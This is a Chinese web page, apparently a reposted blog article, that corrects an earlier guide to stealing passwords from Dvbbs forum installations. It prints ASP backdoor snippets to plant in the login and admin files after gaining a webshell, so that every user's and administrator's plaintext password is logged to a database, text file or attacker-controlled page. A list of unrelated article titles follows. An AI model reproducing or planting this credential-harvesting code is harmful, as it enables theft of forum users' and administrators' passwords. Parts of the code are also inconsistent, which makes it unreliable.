关于"截取动网BBS的用户密码"一文的校正
来源:互联网 发布:linux gzip zip 编辑:程序博客网 时间:2024/06/08 05:49
原文说:要在它验证的前面得到它的密码,所以,我在Function Dvbbs_ChkLogin
后面加上Code:
dim dbpath,rstmp,str,rs,con
set con=server.createobject("adodb.connection")
DBPath = Server.MapPath("example.mdb")
con.Open "driver={ Microsoft Access Driver (*.mdb) };dbq=" & DBPath
set rstmp=server.createobject("adodb.recordset")
username = Request.form("username")
password = Request.form("password")
str="insert Into User (username,password) v alues('"& username &"','"& password &"')"
con.execute(str)
这句话说得不是太明白,我经过测试发现应该是在
Function Dvbbs_ChkLogin
。。。
End Function中间插入上面的代码,但是上面的代码写得不规范,调试时总是出错,最明显的“v alues”也写分开了。
我把代码调整了一下,如下:
dim dbpath,rstmp,str,rs,con
set con=server.createobject("adodb.connection")
DBPath = Server.MapPath("bbs.mdb")
con.Open "driver={Microsoft Access Driver (*.mdb)};dbq="&DBPath
set rstmp=server.createobject("adodb.recordset")
username = Request.form("username")
password = Request.form("password")
str="insert Into User (username,password) values('"&username&"','"&password&"')"
con.execute(str)
写一个关于TXT的吧!!今天在918X哪里看到 下文:
我们知道以前,获得webshell后想进入DVBBS的后台,想要管理员的密码可以这样:
老办法:
修改admin_index.asp得到明文DVBBS后台密码
在"username=trim(replace(request("username")这行后面
Dim fsoObject
Dim tsObject
Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")
set tsObject = fsoObject.CreateTextFile(Server.MapPath("rain.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
只要管理员登陆后台,在目录下就生成了rain.txt,里面就记录了明文密码
这个办法有个缺点是需要FileSystemObject的支持,也就是需要FSO,对于没有FileSystemObject的主机就没有用了。
新办法:
方法一:login.asp中Case "chk"下:
on error resume next
dim rain
set lP=server.CreateObject("Adodb.Stream")
rain.Open
rain.Type=2
rain.CharSet="gb2312"
rain.LoadFromFile server.mapPath("918.asp")
rain.Position=lp.Size
rain.writetext now&request("username")&"text:"&request("password")&chr(10)
rain.SaveToFile server.mapPath("918.asp"),2
rain.Close
set rain=nothing
这样918.asp将获得全部登陆人的密码,时间和名字。
至于admin_index.asp你也可以加在这里只获得管理员的密码。
方法二:如果你有自己的网站:
建立目录918x,在里面建立一个空的918.asp和如下代码的rain.asp:
在login.asp那里插入一句: response.write "" --------所有登陆人都会乖乖的把名字和密码送到你的918.asp 里这下调用Adodb.Stream,几乎机子里有是有的,所以成功率要更高
- 关于"截取动网BBS的用户密码"一文的校正
- 截取动网BBS的用户密码
- python破解教程一 破解211高校BBS论坛的用户密码
- 关于登陆时被截取用户密码的一点想法(出自新手,勿喷)
- 关于BBS的思考1
- 关于3D的bbs
- 关于BBS的一些资料
- 关于Ubuntu的root用户密码
- matlab_关于倾斜校正的函数
- 关于字符串的截取
- 关于字符串的截取
- 一功能简单的BBS系统源代码
- 基于mysql的bbs(一)
- 基于mysql的bbs设计(一)
- 关于JBoss封装数据源访问的用户密码
- ORACLE11g关于用户密码过期的问题解决
- 关于如何修改weblogic用户密码的问题
- 关于oracle用户密码过期的解决方法
- 一首简单的歌
- DB2数据库开发与应用:
- 生活有多面性,你可以选择快乐也可选择痛苦,主动权在自己的手里
- 成熟者的心理特征
- 截取动网BBS的用户密码
- 关于"截取动网BBS的用户密码"一文的校正
- NeoSwiff的图像按钮
- 请教一个关于弹出对话框的问题.
- 有一架天平12个小球,其中有11个重量相同,1个与另外11个不同(不清楚这个球是轻还是重),要求最多称3次,就可以将其中重量特殊的小球找出来。
- 04年全球半导体业Top50
- blogj近日正式开张。
- Readme
- VC ODBC使用总结
- 安全的重要性 昨天我电脑中毒了 顺便上网络找资料看这个一条好消息